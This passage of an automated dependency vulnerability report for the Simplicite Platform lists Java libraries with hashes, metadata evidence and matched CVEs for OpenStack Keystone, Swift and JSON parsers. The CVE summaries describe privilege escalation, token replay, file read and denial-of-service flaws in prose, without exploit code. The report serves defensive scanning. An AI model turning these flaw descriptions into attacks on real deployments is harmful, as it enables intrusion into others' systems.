Evidence Type Source Name Value Confidence Vendor file name ojdbc8 High Vendor jar package name driver Highest Vendor jar package name jdbc Highest Vendor jar package name oracle Highest Vendor jar (hint) package name sun Highest Vendor Manifest automatic-module-name com.oracle.database.jdbc Medium Vendor Manifest Implementation-Vendor Oracle Corporation High Vendor Manifest repository-id JAVAVM_MAIN_LINUX.X64_230807.6 Low Vendor Manifest specification-vendor Sun Microsystems Inc. Low Vendor pom artifactid ojdbc8 Highest Vendor pom artifactid ojdbc8 Low Vendor pom developer org Oracle America, Inc. Medium Vendor pom developer org URL http://www.oracle.com Medium Vendor pom groupid com.oracle.database.jdbc Highest Vendor pom name ojdbc8 High Vendor pom url https://www.oracle.com/database/technologies/maven-central-guide.html Highest Product file name ojdbc8 High Product jar package name driver Highest Product jar package name jdbc Highest Product jar package name oracle Highest Product Manifest automatic-module-name com.oracle.database.jdbc Medium Product Manifest Implementation-Title JDBC High Product Manifest repository-id JAVAVM_MAIN_LINUX.X64_230807.6 Low Product Manifest specification-title JDBC Medium Product pom artifactid ojdbc8 Highest Product pom developer org Oracle America, Inc. Low Product pom developer org URL http://www.oracle.com Low Product pom groupid com.oracle.database.jdbc Highest Product pom name ojdbc8 High Product pom url https://www.oracle.com/database/technologies/maven-central-guide.html Medium Version file version 23.3.0.23.09 High Version Manifest Implementation-Version 23.3.0.23.09 High Version pom version 23.3.0.23.09 Highest
opencensus-api-0.24.0.jarDescription:
null License:
The Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/io/opencensus/opencensus-api/0.24.0/opencensus-api-0.24.0.jar
MD5: 57e26d9c2d3947a0b3716ec8bb32c9bf
SHA1: f974451b19007ce820f433311ce8adb88e2b7d2c
SHA256: f561b1cc2673844288e596ddf5bb6596868a8472fd2cb8993953fc5c034b2352
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name opencensus-api High Vendor jar package name io Highest Vendor jar package name opencensus Highest Vendor Manifest source-compatibility 1.7 Low Vendor Manifest target-compatibility 1.7 Low Vendor pom artifactid opencensus-api Highest Vendor pom artifactid opencensus-api Low Vendor pom developer email census-developers@googlegroups.com Low Vendor pom developer id io.opencensus Medium Vendor pom developer name OpenCensus Contributors Medium Vendor pom developer org OpenCensus Authors Medium Vendor pom developer org URL https://www.opencensus.io Medium Vendor pom groupid io.opencensus Highest Vendor pom name OpenCensus High Vendor pom url census-instrumentation/opencensus-java Highest Product file name opencensus-api High Product jar package name io Highest Product jar package name opencensus Highest Product Manifest Implementation-Title opencensus-api High Product Manifest source-compatibility 1.7 Low Product Manifest target-compatibility 1.7 Low Product pom artifactid opencensus-api Highest Product pom developer email census-developers@googlegroups.com Low Product pom developer id io.opencensus Low Product pom developer name OpenCensus Contributors Low Product pom developer org OpenCensus Authors Low Product pom developer org URL https://www.opencensus.io Low Product pom groupid io.opencensus Highest Product pom name OpenCensus High Product pom url census-instrumentation/opencensus-java High Version file version 0.24.0 High Version Manifest Implementation-Version 0.24.0 High Version pom version 0.24.0 Highest
opencensus-contrib-grpc-metrics-0.21.0.jarDescription:
null License:
The Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/io/opencensus/opencensus-contrib-grpc-metrics/0.21.0/opencensus-contrib-grpc-metrics-0.21.0.jar
MD5: dbbefdc1c3e6bee5e578812d961ca6ba
SHA1: f07d3a325f1fe69ee40d6b409086964edfef4e69
SHA256: 29fc79401082301542cab89d7054d2f0825f184492654c950020553ef4ff0ef8
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name opencensus-contrib-grpc-metrics High Vendor jar package name contrib Highest Vendor jar package name grpc Highest Vendor jar package name io Highest Vendor jar package name opencensus Highest Vendor Manifest source-compatibility 1.7 Low Vendor Manifest target-compatibility 1.7 Low Vendor pom artifactid opencensus-contrib-grpc-metrics Highest Vendor pom artifactid opencensus-contrib-grpc-metrics Low Vendor pom developer email census-developers@googlegroups.com Low Vendor pom developer id io.opencensus Medium Vendor pom developer name OpenCensus Contributors Medium Vendor pom developer org OpenCensus Authors Medium Vendor pom developer org URL https://www.opencensus.io Medium Vendor pom groupid io.opencensus Highest Vendor pom name OpenCensus High Vendor pom url census-instrumentation/opencensus-java Highest Product file name opencensus-contrib-grpc-metrics High Product jar package name contrib Highest Product jar package name grpc Highest Product jar package name io Highest Product jar package name opencensus Highest Product Manifest Implementation-Title opencensus-contrib-grpc-metrics High Product Manifest source-compatibility 1.7 Low Product Manifest target-compatibility 1.7 Low Product pom artifactid opencensus-contrib-grpc-metrics Highest Product pom developer email census-developers@googlegroups.com Low Product pom developer id io.opencensus Low Product pom developer name OpenCensus Contributors Low Product pom developer org OpenCensus Authors Low Product pom developer org URL https://www.opencensus.io Low Product pom groupid io.opencensus Highest Product pom name OpenCensus High Product pom url census-instrumentation/opencensus-java High Version file version 0.21.0 High Version Manifest Implementation-Version 0.21.0 High Version pom version 0.21.0 Highest
opencensus-contrib-grpc-util-0.21.0.jarDescription:
null License:
The Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/io/opencensus/opencensus-contrib-grpc-util/0.21.0/opencensus-contrib-grpc-util-0.21.0.jar
MD5: c8d17aa0a8707b0244c324ac8722094f
SHA1: 758d60f34833809df6563e7532e852f61f14b898
SHA256: ad44bf7df586d2e8eb1dad5849cd8b50429ed20fe80da76129006318a4a30ef1
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name opencensus-contrib-grpc-util High Vendor jar package name contrib Highest Vendor jar package name grpc Highest Vendor jar package name io Highest Vendor jar package name opencensus Highest Vendor Manifest source-compatibility 1.7 Low Vendor Manifest target-compatibility 1.7 Low Vendor pom artifactid opencensus-contrib-grpc-util Highest Vendor pom artifactid opencensus-contrib-grpc-util Low Vendor pom developer email census-developers@googlegroups.com Low Vendor pom developer id io.opencensus Medium Vendor pom developer name OpenCensus Contributors Medium Vendor pom developer org OpenCensus Authors Medium Vendor pom developer org URL https://www.opencensus.io Medium Vendor pom groupid io.opencensus Highest Vendor pom name OpenCensus High Vendor pom url census-instrumentation/opencensus-java Highest Product file name opencensus-contrib-grpc-util High Product jar package name contrib Highest Product jar package name grpc Highest Product jar package name io Highest Product jar package name opencensus Highest Product Manifest Implementation-Title opencensus-contrib-grpc-util High Product Manifest source-compatibility 1.7 Low Product Manifest target-compatibility 1.7 Low Product pom artifactid opencensus-contrib-grpc-util Highest Product pom developer email census-developers@googlegroups.com Low Product pom developer id io.opencensus Low Product pom developer name OpenCensus Contributors Low Product pom developer org OpenCensus Authors Low Product pom developer org URL https://www.opencensus.io Low Product pom groupid io.opencensus Highest Product pom name OpenCensus High Product pom url census-instrumentation/opencensus-java High Version file version 0.21.0 High Version Manifest Implementation-Version 0.21.0 High Version pom version 0.21.0 Highest
opencensus-contrib-http-util-0.24.0.jarDescription:
null License:
The Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/io/opencensus/opencensus-contrib-http-util/0.24.0/opencensus-contrib-http-util-0.24.0.jar
MD5: 12d9df25feb2c6ff817465103dd3e13f
SHA1: 006d96406c272d884038eb63b262458df75b5445
SHA256: 7155273bbb1ed3d477ea33cf19d7bbc0b285ff395f43b29ae576722cf247000f
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name opencensus-contrib-http-util High Vendor jar package name contrib Highest Vendor jar package name http Highest Vendor jar package name io Highest Vendor jar package name opencensus Highest Vendor Manifest source-compatibility 1.7 Low Vendor Manifest target-compatibility 1.7 Low Vendor pom artifactid opencensus-contrib-http-util Highest Vendor pom artifactid opencensus-contrib-http-util Low Vendor pom developer email census-developers@googlegroups.com Low Vendor pom developer id io.opencensus Medium Vendor pom developer name OpenCensus Contributors Medium Vendor pom developer org OpenCensus Authors Medium Vendor pom developer org URL https://www.opencensus.io Medium Vendor pom groupid io.opencensus Highest Vendor pom name OpenCensus High Vendor pom url census-instrumentation/opencensus-java Highest Product file name opencensus-contrib-http-util High Product jar package name contrib Highest Product jar package name http Highest Product jar package name io Highest Product jar package name opencensus Highest Product Manifest Implementation-Title opencensus-contrib-http-util High Product Manifest source-compatibility 1.7 Low Product Manifest target-compatibility 1.7 Low Product pom artifactid opencensus-contrib-http-util Highest Product pom developer email census-developers@googlegroups.com Low Product pom developer id io.opencensus Low Product pom developer name OpenCensus Contributors Low Product pom developer org OpenCensus Authors Low Product pom developer org URL https://www.opencensus.io Low Product pom groupid io.opencensus Highest Product pom name OpenCensus High Product pom url census-instrumentation/opencensus-java High Version file version 0.24.0 High Version Manifest Implementation-Version 0.24.0 High Version pom version 0.24.0 Highest
openjson-1.0.11.jarDescription:
A clean-room Apache-licensed implementation of simple JSON processing License:
The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/com/github/openjson/openjson/1.0.11/openjson-1.0.11.jar
MD5: adea05d96e2b300d8d93d87877bbfc0c
SHA1: 89d80fba6ebca174f23614cdfd6e50331c676d26
SHA256: 6086e8c4219281e42c4ccb3dbf207995bd10787d27b01aaf00ac1f9b0dd34c9f
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name openjson High Vendor jar package name github Highest Vendor jar package name json Highest Vendor jar package name openjson Highest Vendor Manifest automatic-module-name com.github.openjson Medium Vendor Manifest build-jdk-spec 11 Low Vendor Manifest bundle-docurl https://github.com/openjson/openjson Low Vendor Manifest bundle-symbolicname com.github.openjson Medium Vendor Manifest originally-created-by Apache Maven Bundle Plugin Low Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" Low Vendor pom artifactid openjson Highest Vendor pom artifactid openjson Low Vendor pom developer id openjson Medium Vendor pom developer name openjson team Medium Vendor pom groupid com.github.openjson Highest Vendor pom name Open JSON High Vendor pom url openjson/openjson Highest Product file name openjson High Product jar package name github Highest Product jar package name json Highest Product jar package name openjson Highest Product Manifest automatic-module-name com.github.openjson Medium Product Manifest build-jdk-spec 11 Low Product Manifest bundle-docurl https://github.com/openjson/openjson Low Product Manifest Bundle-Name Open JSON Medium Product Manifest bundle-symbolicname com.github.openjson Medium Product Manifest originally-created-by Apache Maven Bundle Plugin Low Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" Low Product pom artifactid openjson Highest Product pom developer id openjson Low Product pom developer name openjson team Low Product pom groupid com.github.openjson Highest Product pom name Open JSON High Product pom url openjson/openjson High Version file version 1.0.11 High Version Manifest Bundle-Version 1.0.11 High Version pom version 1.0.11 Highest
CVE-2022-45688 suppress
A stack overflow in the XML.toJSONObject component of hutool-json v5.8.10 allows attackers to cause a Denial of Service (DoS) via crafted JSON or XML data. CWE-787 Out-of-bounds Write
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions: (show all )
CVE-2023-5072 suppress
Denial of Service in JSON-Java versions up to and including 20230618. A bug in the parser means that an input string of modest size can lead to indefinite amounts of memory being used.
CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions:
opennlp-tools-1.9.1.jarDescription:
The Apache Software Foundation provides support for the Apache community of open-source software projects. The Apache projects are characterized by a collaborative, consensus based development process, an open and pragmatic software license, and a desire to create high quality software that leads the way in its field. We consider ourselves not simply a group of projects sharing a server, but rather a community of developers and users. License:
https://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/org/apache/opennlp/opennlp-tools/1.9.1/opennlp-tools-1.9.1.jar
MD5: d7c38308f18fcbba1bd87d0d8991ed82
SHA1: 8145429d82a4b811fdd3390557dbe6546b0153ad
SHA256: 79711328756f4c8a909d7ae36d62bf2f949cca685d98bfd46b052e24b15df7e2
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name opennlp-tools High Vendor jar package name opennlp Highest Vendor jar package name tools Highest Vendor Manifest automatic-module-name org.apache.opennlp.tools Medium Vendor Manifest bundle-docurl https://www.apache.org/ Low Vendor Manifest bundle-requiredexecutionenvironment JavaSE-1.8 Low Vendor Manifest bundle-symbolicname org.apache.opennlp.tools Medium Vendor Manifest Implementation-Vendor The Apache Software Foundation High Vendor Manifest Implementation-Vendor-Id org.apache.opennlp Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.8))" Low Vendor Manifest specification-vendor The Apache Software Foundation Low Vendor pom artifactid opennlp-tools Highest Vendor pom artifactid opennlp-tools Low Vendor pom groupid org.apache.opennlp Highest Vendor pom name Apache OpenNLP Tools High Vendor pom parent-artifactid opennlp Low Product file name opennlp-tools High Product jar package name opennlp Highest Product jar package name tools Highest Product jar package name version Highest Product Manifest automatic-module-name org.apache.opennlp.tools Medium Product Manifest bundle-docurl https://www.apache.org/ Low Product Manifest Bundle-Name Apache OpenNLP Tools Medium Product Manifest bundle-requiredexecutionenvironment JavaSE-1.8 Low Product Manifest bundle-symbolicname org.apache.opennlp.tools Medium Product Manifest Implementation-Title Apache OpenNLP Tools High Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.8))" Low Product Manifest specification-title Apache OpenNLP Tools Medium Product pom artifactid opennlp-tools Highest Product pom groupid org.apache.opennlp Highest Product pom name Apache OpenNLP Tools High Product pom parent-artifactid opennlp Medium Version file version 1.9.1 High Version Manifest Bundle-Version 1.9.1 High Version Manifest Implementation-Version 1.9.1 High Version pom version 1.9.1 Highest
openstack-keystone-2.2.0.jarDescription:
jclouds components to access an implementation of OpenStack Keystone License:
https://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/org/apache/jclouds/api/openstack-keystone/2.2.0/openstack-keystone-2.2.0.jar
MD5: ba713f3c51fee7ad71e8ab3578935b7a
SHA1: 27151bb37c58c3eb45a519b829148435798dc2ca
SHA256: 299711877eda635713a7a946a29bacfdaeeeb19f965d54fd8b5491261d5a0596
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name openstack-keystone High Vendor jar package name jclouds Highest Vendor jar package name keystone Highest Vendor jar package name openstack Highest Vendor Manifest bundle-docurl http://www.apache.org/ Low Vendor Manifest bundle-symbolicname openstack-keystone Medium Vendor Manifest Implementation-Vendor jclouds High Vendor Manifest Implementation-Vendor-Id org.jclouds Medium Vendor Manifest specification-vendor jclouds Low Vendor pom artifactid openstack-keystone Highest Vendor pom artifactid openstack-keystone Low Vendor pom groupid org.apache.jclouds.api Highest Vendor pom name jclouds openstack-keystone api High Vendor pom parent-artifactid jclouds-project Low Vendor pom parent-groupid org.apache.jclouds Medium Product file name openstack-keystone High Product jar package name jclouds Highest Product jar package name keystone Highest Product jar package name openstack Highest Product Manifest bundle-docurl http://www.apache.org/ Low Product Manifest Bundle-Name jclouds openstack-keystone api Medium Product Manifest bundle-symbolicname openstack-keystone Medium Product Manifest Implementation-Title jclouds openstack-keystone api High Product Manifest specification-title jclouds jclouds openstack-keystone api Medium Product pom artifactid openstack-keystone Highest Product pom groupid org.apache.jclouds.api Highest Product pom name jclouds openstack-keystone api High Product pom parent-artifactid jclouds-project Medium Product pom parent-groupid org.apache.jclouds Medium Version file version 2.2.0 High Version Manifest Bundle-Version 2.2.0 High Version Manifest Implementation-Version 2.2.0 High Version pom version 2.2.0 Highest
CVE-2020-12689 suppress
An issue was discovered in OpenStack Keystone before 15.0.1, and 16.0.0. Any user authenticated within a limited scope (trust/oauth/application credential) can create an EC2 credential with an escalated permission, such as obtaining admin while the user is on a limited viewer role. This potentially allows a malicious user to act as the admin on a project another user has the admin role on, which can effectively grant that user global admin privileges. CWE-269 Improper Privilege Management
CVSSv2:
Base Score: MEDIUM (6.5) Vector: /AV:N/AC:L/Au:S/C:P/I:P/A:P CVSSv3:
Base Score: HIGH (8.8) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H References:
Vulnerable Software & Versions: (show all )
CVE-2020-12690 suppress
An issue was discovered in OpenStack Keystone before 15.0.1, and 16.0.0. The list of roles provided for an OAuth1 access token is silently ignored. Thus, when an access token is used to request a keystone token, the keystone token contains every role assignment the creator had for the project. This results in the provided keystone token having more role assignments than the creator intended, possibly giving unintended escalated access. CWE-613 Insufficient Session Expiration
CVSSv2:
Base Score: MEDIUM (6.5) Vector: /AV:N/AC:L/Au:S/C:P/I:P/A:P CVSSv3:
Base Score: HIGH (8.8) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H References:
Vulnerable Software & Versions: (show all )
CVE-2020-12691 suppress
An issue was discovered in OpenStack Keystone before 15.0.1, and 16.0.0. Any authenticated user can create an EC2 credential for themselves for a project that they have a specified role on, and then perform an update to the credential user and project, allowing them to masquerade as another user. This potentially allows a malicious user to act as the admin on a project another user has the admin role on, which can effectively grant that user global admin privileges. CWE-863 Incorrect Authorization
CVSSv2:
Base Score: MEDIUM (6.5) Vector: /AV:N/AC:L/Au:S/C:P/I:P/A:P CVSSv3:
Base Score: HIGH (8.8) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H References:
Vulnerable Software & Versions: (show all )
CVE-2021-3563 suppress
A flaw was found in openstack-keystone. Only the first 72 characters of an application secret are verified allowing attackers bypass some password complexity which administrators may be counting on. The highest threat from this vulnerability is to data confidentiality and integrity. CWE-863 Incorrect Authorization
CVSSv3:
Base Score: HIGH (7.4) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N References:
Vulnerable Software & Versions: (show all )
CVE-2020-12692 suppress
An issue was discovered in OpenStack Keystone before 15.0.1, and 16.0.0. The EC2 API doesn't have a signature TTL check for AWS Signature V4. An attacker can sniff the Authorization header, and then use it to reissue an OpenStack token an unlimited number of times. CWE-347 Improper Verification of Cryptographic Signature, CWE-294 Authentication Bypass by Capture-replay
CVSSv2:
Base Score: MEDIUM (5.5) Vector: /AV:N/AC:L/Au:S/C:P/I:P/A:N CVSSv3:
Base Score: MEDIUM (5.4) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N References:
Vulnerable Software & Versions: (show all )
CVE-2018-14432 suppress
In the Federation component of OpenStack Keystone before 11.0.4, 12.0.0, and 13.0.0, an authenticated "GET /v3/OS-FEDERATION/projects" request may bypass intended access restrictions on listing projects. An authenticated user may discover projects they have no authority to access, leaking all projects in the deployment and their attributes. Only Keystone with the /v3/OS-FEDERATION endpoint enabled via policy.json is affected. CWE-200 Information Exposure
CVSSv2:
Base Score: LOW (3.5) Vector: /AV:N/AC:M/Au:S/C:P/I:N/A:N CVSSv3:
Base Score: MEDIUM (5.3) Vector: CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N References:
Vulnerable Software & Versions: (show all )
CVE-2018-20170 suppress
OpenStack Keystone through 14.0.1 has a user enumeration vulnerability because invalid usernames have much faster responses than valid ones for a POST /v3/auth/tokens request. NOTE: the vendor's position is that this is a hardening opportunity, and not necessarily an issue that should have an OpenStack Security Advisory CWE-200 Information Exposure
CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:P/I:N/A:N CVSSv3:
Base Score: MEDIUM (5.3) Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N References:
Vulnerable Software & Versions:
openstack-swift-2.2.0.jarDescription:
jclouds components to access an implementation of OpenStack Swift License:
https://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/org/apache/jclouds/api/openstack-swift/2.2.0/openstack-swift-2.2.0.jar
MD5: ca0768eb49f2856e5000e7fc424d3047
SHA1: bf907cbeec176840dbd0daeea90c4b4902f7fbc0
SHA256: aca9b128760baefd27418cbcef560e74038da5645b2421729e7354ed6adf7f00
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name openstack-swift High Vendor jar package name jclouds Highest Vendor jar package name openstack Highest Vendor jar package name swift Highest Vendor Manifest bundle-docurl http://www.apache.org/ Low Vendor Manifest bundle-symbolicname openstack-swift Medium Vendor Manifest Implementation-Vendor jclouds High Vendor Manifest Implementation-Vendor-Id org.jclouds Medium Vendor Manifest specification-vendor jclouds Low Vendor pom artifactid openstack-swift Highest Vendor pom artifactid openstack-swift Low Vendor pom groupid org.apache.jclouds.api Highest Vendor pom name jclouds openstack-swift api High Vendor pom parent-artifactid jclouds-project Low Vendor pom parent-groupid org.apache.jclouds Medium Product file name openstack-swift High Product jar package name jclouds Highest Product jar package name openstack Highest Product jar package name swift Highest Product Manifest bundle-docurl http://www.apache.org/ Low Product Manifest Bundle-Name jclouds openstack-swift api Medium Product Manifest bundle-symbolicname openstack-swift Medium Product Manifest Implementation-Title jclouds openstack-swift api High Product Manifest specification-title jclouds jclouds openstack-swift api Medium Product pom artifactid openstack-swift Highest Product pom groupid org.apache.jclouds.api Highest Product pom name jclouds openstack-swift api High Product pom parent-artifactid jclouds-project Medium Product pom parent-groupid org.apache.jclouds Medium Version file version 2.2.0 High Version Manifest Bundle-Version 2.2.0 High Version Manifest Implementation-Version 2.2.0 High Version pom version 2.2.0 Highest
CVE-2017-16613 suppress
An issue was discovered in middleware.py in OpenStack Swauth through 1.2.0 when used with OpenStack Swift through 2.15.1. The Swift object store and proxy server are saving (unhashed) tokens retrieved from the Swauth middleware authentication mechanism to a log file as part of a GET URI. This allows attackers to bypass authentication by inserting a token into an X-Auth-Token header of a new request. NOTE: github.com/openstack/swauth URLs do not mean that Swauth is maintained by an official OpenStack project team. CWE-287 Improper Authentication
CVSSv2:
Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H References:
Vulnerable Software & Versions: (show all )
CVE-2016-0737 suppress
OpenStack Object Storage (Swift) before 2.4.0 does not properly close client connections, which allows remote attackers to cause a denial of service (proxy-server resource consumption) via a series of interrupted requests to a Large Object URL. CWE-399 Resource Management Errors
CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions:
CVE-2016-0738 suppress
OpenStack Object Storage (Swift) before 2.3.1 (Kilo), 2.4.x, and 2.5.x before 2.5.1 (Liberty) do not properly close server connections, which allows remote attackers to cause a denial of service (proxy-server resource consumption) via a series of interrupted requests to a Large Object URL. CWE-399 Resource Management Errors
CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions: (show all )
CVE-2022-47950 suppress
An issue was discovered in OpenStack Swift before 2.28.1, 2.29.x before 2.29.2, and 2.30.0. By supplying crafted XML files, an authenticated user may coerce the S3 API into returning arbitrary file contents from the host server, resulting in unauthorized read access to potentially sensitive data. This impacts both s3api deployments (Rocky or later), and swift3 deployments (Queens and earlier, no longer actively developed). CWE-552 Files or Directories Accessible to External Parties
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N References:
Vulnerable Software & Versions: (show all )
CVE-2015-1856 suppress
OpenStack Object Storage (Swift) before 2.3.0, when allow_version is configured, allows remote authenticated users to delete the latest version of an object by leveraging listing access to the x-versions-location container. CWE-264 Permissions, Privileges, and Access Controls
CVSSv2:
Base Score: MEDIUM (5.5) Vector: /AV:N/AC:L/Au:S/C:N/I:P/A:P References:
Vulnerable Software & Versions:
CVE-2015-5223 suppress
OpenStack Object Storage (Swift) before 2.4.0 allows attackers to obtain sensitive information via a PUT tempurl and a DLO object manifest that references an object in another container. CWE-200 Information Exposure
CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:P/I:N/A:N References:
Vulnerable Software & Versions:
CVE-2017-8761 suppress
In OpenStack Swift through 2.10.1, 2.11.0 through 2.13.0, and 2.14.0, the proxy-server logs full tempurl paths, potentially leaking reusable tempurl signatures to anyone with read access to these logs. All Swift deployments using the tempurl middleware are affected. CWE-200 Information Exposure
CVSSv2:
Base Score: MEDIUM (4.0) Vector: /AV:N/AC:L/Au:S/C:P/I:N/A:N CVSSv3:
Base Score: MEDIUM (4.3) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N References:
Vulnerable Software & Versions: (show all )
org.apache.oltu.oauth2.client-1.0.2.jarDescription:
Apache Oltu is an OAuth protocol implementation in Java. License:
http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/org/apache/oltu/oauth2/org.apache.oltu.oauth2.client/1.0.2/org.apache.oltu.oauth2.client-1.0.2.jar
MD5: 433638a5fab67c3a8f111d58c1fec0a0
SHA1: b34e09d1cb84c4b63cedb65c5346ac44eecc22c5
SHA256: ebbe0095c829ecbbb29b5ab572277ff11b9e3969114e6f1bac5d23a8c97e7708
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name org.apache.oltu.oauth2.client High Vendor jar package name apache Highest Vendor jar package name client Highest Vendor jar package name oauth2 Highest Vendor jar package name oltu Highest Vendor Manifest bundle-docurl https://oltu.apache.org/org.apache.oltu.oauth2.parent/org.apache.oltu.oauth2.client/ Low Vendor Manifest bundle-symbolicname org.apache.oltu.oauth2.client Medium Vendor Manifest implementation-build tags/org.apache.oltu.oauth2.parent-1.0.2/client@r1740515 Low Vendor Manifest implementation-build-date 2016-04-22 13:07:39+0000 Low Vendor pom artifactid apache.oltu.oauth2.client Low Vendor pom artifactid org.apache.oltu.oauth2.client Highest Vendor pom groupid org.apache.oltu.oauth2 Highest Vendor pom name Apache Oltu - OAuth 2.0 - Client High Vendor pom parent-artifactid org.apache.oltu.oauth2.parent Low Product file name org.apache.oltu.oauth2.client High Product jar package name apache Highest Product jar package name client Highest Product jar package name oauth2 Highest Product jar package name oltu Highest Product Manifest bundle-docurl https://oltu.apache.org/org.apache.oltu.oauth2.parent/org.apache.oltu.oauth2.client/ Low Product Manifest Bundle-Name Apache Oltu - OAuth 2.0 - Client Medium Product Manifest bundle-symbolicname org.apache.oltu.oauth2.client Medium Product Manifest implementation-build tags/org.apache.oltu.oauth2.parent-1.0.2/client@r1740515 Low Product Manifest implementation-build-date 2016-04-22 13:07:39+0000 Low Product pom artifactid apache.oltu.oauth2.client Highest Product pom artifactid org.apache.oltu.oauth2.client Highest Product pom groupid org.apache.oltu.oauth2 Highest Product pom name Apache Oltu - OAuth 2.0 - Client High Product pom parent-artifactid org.apache.oltu.oauth2.parent Medium Version file version 1.0.2 High Version Manifest Bundle-Version 1.0.2 High Version pom version 1.0.2 Highest
org.apache.oltu.oauth2.common-1.0.2.jarDescription:
OAuth 2.0 library - Common License:
http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/org/apache/oltu/oauth2/org.apache.oltu.oauth2.common/1.0.2/org.apache.oltu.oauth2.common-1.0.2.jar
MD5: 48d5e8f17d2f292b32788d2b98b1aebd
SHA1: a82fff95276f4c6feadc7993670e659076e43260
SHA256: 5e7ce01db88b361543e75644269c9447a059a5fecc23a15f3546eff8680ec968
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name org.apache.oltu.oauth2.common High Vendor jar package name apache Highest Vendor jar package name common Highest Vendor jar package name oauth2 Highest Vendor jar package name oltu Highest Vendor Manifest bundle-docurl https://oltu.apache.org/org.apache.oltu.oauth2.parent/org.apache.oltu.oauth2.common/ Low Vendor Manifest bundle-symbolicname org.apache.oltu.oauth2.common Medium Vendor Manifest implementation-build tags/org.apache.oltu.oauth2.parent-1.0.2/common@r1740515 Low Vendor Manifest implementation-build-date 2016-04-22 13:07:39+0000 Low Vendor pom artifactid apache.oltu.oauth2.common Low Vendor pom artifactid org.apache.oltu.oauth2.common Highest Vendor pom groupid org.apache.oltu.oauth2 Highest Vendor pom name Apache Oltu - OAuth 2.0 - Common High Vendor pom parent-artifactid org.apache.oltu.oauth2.parent Low Product file name org.apache.oltu.oauth2.common High Product jar package name apache Highest Product jar package name common Highest Product jar package name oauth2 Highest Product jar package name oltu Highest Product Manifest bundle-docurl https://oltu.apache.org/org.apache.oltu.oauth2.parent/org.apache.oltu.oauth2.common/ Low Product Manifest Bundle-Name Apache Oltu - OAuth 2.0 - Common Medium Product Manifest bundle-symbolicname org.apache.oltu.oauth2.common Medium Product Manifest implementation-build tags/org.apache.oltu.oauth2.parent-1.0.2/common@r1740515 Low Product Manifest implementation-build-date 2016-04-22 13:07:39+0000 Low Product pom artifactid apache.oltu.oauth2.common Highest Product pom artifactid org.apache.oltu.oauth2.common Highest Product pom groupid org.apache.oltu.oauth2 Highest Product pom name Apache Oltu - OAuth 2.0 - Common High Product pom parent-artifactid org.apache.oltu.oauth2.parent Medium Version file version 1.0.2 High Version Manifest Bundle-Version 1.0.2 High 